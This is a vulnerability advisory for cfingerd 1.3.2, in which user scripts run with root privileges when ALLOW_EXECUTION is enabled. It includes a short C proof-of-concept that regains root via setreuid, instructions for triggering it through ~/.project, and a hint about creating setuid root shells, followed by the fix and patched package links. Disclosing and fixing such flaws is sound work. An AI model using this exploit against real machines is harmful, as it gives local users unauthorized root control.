COMMAND
cfinger
SYSTEMS AFFECTED
Systems running cfingerd 1.3.2
PROBLEM
John Goerzen found out that cfingerd 1.3.2 contains a security
hole that could lead to easy root compromise for any user that has
an account on the local machine, but only if ALLOW_EXECUTION is
set in /etc/cfingerd/cfingerd.conf. By default, this option is
DISABLED in Debian GNU/Linux.
The ALLOW_EXECUTION option permits any user on the system to
execute a program when their username is fingered. cfingerd needs
to run as root but doesn't properly throw away root permissions
when it starts up the user's script. When it is told to invoke
/usr/bin/id from a user's script, it produces:
uid=0(root) gid=0(root) euid=65534(nobody) groups=0(root)
As for exploit, have it exec this:
void main(void) {
setreuid(0,0);
system("/usr/bin/id");
}
Of course, system can exec any more devious command you chose --
ie, marking a shell setuid root, etc. (Can also be done with C
calls.) To test the exploit, put something like this in
~/.project:
$exec /home/jgoerzen/test
and set the ALLOW_EXECUTION to be enabled. This will give root
for everything. Additionally, as you can tell, it fails to
relenquish group permissions at all. After applying the below
fix, the new output is:
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
SOLUTION
Debian GNU/Linux comes with cfingerd, but in its default
configuration, it is safe. For maximum security, please install
the upgraded packages anyway. cfingerd greater than or equal to
1.3.2-11.0 will have the fix. Go to:
http://happy.cs.twsu.edu/~jgoerzen/cfingerd/
John Goerzen did a dirty hack of cfingerd to run non-root quite
some time ago. You lose a little functionality, but may be nothing
important:
http://users.dandy.net/~fbn/cfingerd-1.3.2.lsm
http://users.dandy.net/~fbn/cfingerd-1.3.2.tar.gz
http://users.dandy.net/~fbn/cfingerd-1.3.2.noroot.lsm
http://users.dandy.net/~fbn/cfingerd-1.3.2.noroot.tar.gz